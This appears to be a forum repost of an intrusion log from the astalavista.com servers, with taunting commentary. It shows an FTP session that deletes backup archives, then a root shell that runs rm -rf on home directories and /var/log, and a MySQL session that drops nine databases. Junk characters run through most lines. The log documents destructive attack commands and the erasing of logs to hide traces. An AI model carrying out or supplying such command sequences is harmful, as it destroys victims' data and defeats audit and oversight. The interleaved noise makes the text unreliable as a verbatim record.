150 Opening BINARY mode data connection for ‘file list’.
! T3 N/ d1 e, G-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
) Z* k& d! y" U-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz27 n, w; J" R# l- y4 S
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2% ]4 ]5 V, v7 ~. }$ P! { ~
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar. @; T% S* f9 e# N
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar) v2 R" r5 g' q: S) D* C
[snip] P5 L `0 P" e( V# b
226 Transfer complete.% Y/ w4 S& [* @5 M( |8 \5 w1 _" h
ftp> mdelete *
$ w/ @: x% \+ ]0 E+ h: Yftp> ls -la
+ i+ L; k& F* N0 U8 b# N/ D227 Entering Passive Mode (212,254,194,163,2,193): Q! ~' A; K: P+ l+ |
150 Opening BINARY mode data connection for ‘file list’.
4 ]9 U7 Y0 x9 Z W4 Q* @) j; h4 e5 G- k226 Transfer complete.
; h3 @) O. I* H7 yftp>
4 A! ?, X* Q# D% Z. n( c1 N+ U
( J3 G: `6 ^$ d2 G3 f2 N8 Ash-3.2# cd /home% T% B0 Q4 \8 l# A* Q
sh-3.2# ls -la
& C) j' x* z' _7 F' @total 120
/ \* G5 P/ P+ r/ tdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
^" M, T3 B/ a* R. D8 ^7 }* _ i' Bdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .." h( a( n+ z2 Q8 Y% {
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin7 N$ u6 m& r) e# U4 |
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group% ?) `, z9 S" t8 w5 @+ |
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user! J$ B- P4 ]$ O" l( U% H+ J
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet( ~' l% l3 z; F6 B. C1 a( p
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup& O) f% b6 T1 q+ H, B9 ^- }
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161' B! I6 o' |2 v# L
drwx–x–x 10 com com 4096 Apr 28 12:40 com
4 j* W' V& g. f; ]2 Ldrwxr-xr-x 2 root root 4096 May 17 2007 ftp# S: M9 K" J0 M+ e
drwx—— 3 jon jon 4096 Sep 21 2007 jon1 b* l3 n; T+ Z2 [' P" V
drwx—— 2 root root 16384 Sep 11 2007 lost+found- b! F, t# q- }/ W; C
drwxr-xr-x 2 root root 4096 Sep 14 2007 my. l) K$ \& I' i, ~
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata+ I6 d, A" b# b( U& K4 `
drwx—— 2 jon jon 4096 Sep 15 2007 test+ Q3 S/ G( ]/ U6 B- _, [, X
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp( ]" S" P+ E: h1 T. b- O7 \
6 Y" u+ J3 H( W, X
sh-3.2# rm -rf backup/
) l' j, @6 ]: f6 t& I# w8 Z- u3 Hsh-3.2# rm -rf backup.14161/
: E' z# J! k8 ?8 ?5 ash-3.2# rm -rf ftp/$ {) C/ Q8 n: d5 E' D V
sh-3.2# rm -rf jon/
8 E6 `! u$ w$ N2 G+ ]sh-3.2# rm -rf my/
5 e4 A, v3 [! t/ {- h1 e) Z4 e7 Osh-3.2# rm -rf mysqldata/
$ \1 }8 W$ Q: g1 m; d$ Lsh-3.2# rm -rf test/
% r- U5 T& D& w; p0 h' vsh-3.2# rm -rf tmp/. V+ Z: ^& A5 y
sh-3.2# cd ~
" j6 f3 y# C! {. X$ e! Lsh-3.2# rm -rf *3 x' @* c: H! x' E2 i- v% s
sh-3.2# rm -rf /var/log/& b" `) w& O3 F
rm: cannot remove directory `/var/log//proftpd’: Directory not empty1 v' ~4 ~* F8 b7 H- G- g4 L% ?
sh-3.2# rm -rf /home/*2 T6 S8 p* p, u7 U
sh-3.2# mysql
* G" a2 L- u3 E$ V% K& fWelcome to the MySQL monitor. Commands end with ; or \g.
- M1 d3 I+ w/ y" a! k; CYour MySQL connection id is 407156! Z* a1 \# b3 E7 L* D y
Server version: 5.0.45-community-log MySQL Community Edition (GPL)8 J# p. q3 x8 l% ?7 m- l/ A; Y
2 q" A+ F8 f, |! S- e6 PType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
/ H' i: T: D I8 m- `2 f- y/ S" G1 U. Q' w7 _
mysql> show databases;
; m0 H( G) t3 O8 Q+———————–+% D, X5 x, }. m
| Database |
4 h5 h) ] G8 V! T1 M+———————–+! ?6 t6 h9 b+ Z- e$ J' X
| information_schema |
2 D% T" c/ r3 D, C| astanet_ads |
" H8 z; ^ p7 `* ^7 F: v| astanet_mailing_lists |3 @. P3 v; ~) @ ~/ ^3 n% J1 I
| astanet_mediawiki |
1 r* g2 N' r! O" a3 m| astanet_membersystem |
' v/ r! Y- r; Z' H9 x| com_contrexx |
( T( w8 p$ n9 |: D- _| com_contrexx2 |
$ |; r5 g5 F: m: r% O) s" p) P| com_contrexx2_live |
; \5 P( [5 K7 E; S- ?) N2 U/ A| da_roundcube |7 ~! U$ Z' E7 x$ U
| dolphin |
8 ^( p: B( ~+ ?- L| ideapool |9 z+ o( \9 B3 ?: {
| mysql |
& E4 y5 B" b* ]2 s| test |
9 x; U" ~& W0 g| yourmaster |
) J1 @+ J1 x, Q+———————–+
: G* }# j4 j% F! M2 J; L14 rows in set (0.03 sec)
8 O! p+ `! m& E, j! A+ v! O
/ N. k' M$ [: T/ S) ^9 g" xmysql> drop database astanet_membersystem;
" [) K3 \' Y& \3 p6 RdroQuery OK, 46 rows affected (0.81 sec): @! A( u9 @0 M
, H' ?5 d2 R% R- y
mysql> drop database com_contrexx;
3 H2 A8 X4 t+ z3 B# vQuery OK, 211 rows affected (2.72 sec)
7 U+ r. L+ l: b" l) d$ b. |: [6 q% b1 |) a
mysql> drop database com_contrexx2;
/ @% M1 L! w* [ @4 ]) j1 `9 ?3 o4 PQuery OK, 237 rows affected (2.23 sec)3 ^2 ^& E. c' f, R
9 n4 C/ U* r( c+ }% R) x0 Y( j
mysql> drop database com_contrexx2_live;
. A% v) O3 ^7 E- fQuery OK, 227 rows affected (7.63 sec)0 E: q! R/ t9 `! l
% _- J0 o5 |) W) W- S4 }mysql> drop database ideapool;
u: P; u/ x) G5 @' A) ^. ~Query OK, 69 rows affected (0.19 sec)
/ Z$ R m$ r# r/ b E/ l7 i5 A& i9 o/ b2 U% F1 h+ v
mysql> drop database yourmaster;
' z3 u7 F& n7 G; m |Query OK, 158 rows affected (0.55 sec)
+ R$ x# j5 N0 ~) b6 X/ g7 m, f& a2 `# n7 F+ N
mysql> drop database astanet_ads;, M7 z( W3 D5 l' _: |5 g- f
Query OK, 9 rows affected (0.11 sec)8 O5 l5 c2 h$ X9 p+ N- i! W: h- p
. l' Y9 U2 u% P* A/ J2 X' ^
mysql> drop database astanet_mailing_lists;
7 o" `& y0 o( F# bQuery OK, 24 rows affected (1.47 sec)5 _ b# A) _4 m; b/ s$ c& H
! X7 g: E* _: E! |mysql> drop database astanet_mediawiki;
0 o9 R! y2 H0 x5 ?Query OK, 31 rows affected (0.51 sec)
; {4 M! i8 _3 ~0 G5 R+ W. J7 J x7 ~5 P: Z9 }
mysql> show databases;9 d8 M8 n9 ~9 R& `9 U4 }. D
+——————–+
* P6 D. Z+ f r+ J0 H0 u9 N1 E| Database |
0 J7 W0 @5 P4 G e, n+——————–+
0 Q. Z6 w% N/ P/ L. Y- L) M| information_schema |
2 p7 Y" U. n3 t9 C# i+ g, ^; q$ P| da_roundcube |0 N( _1 y, H& g6 J& E9 ~! ?
| dolphin |
3 `! e) [. \* f. ?; O# j0 O| mysql |: P! u3 b9 q% j; o# K$ T9 F* K/ u& {
| test |+ @# g. c7 y# [, C' T! n
+——————–+
$ Q% t7 l& V" Q! o5 rows in set (0.00 sec)
% {7 n4 f, g" w, P. d/ u/ `9 i* J0 R! L5 r& G. L
What a journey! We’re not sure exactly why the “Terminator” had any influence on
2 j& B, k* N* M/ ktheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
: V% n& c; _- D! a x' Rwrong to say this pack of morons *wont be back*.4 T$ I, M/ \4 |3 Q
|
发表于 2012-11-6 21:07:34
收藏
支持
反对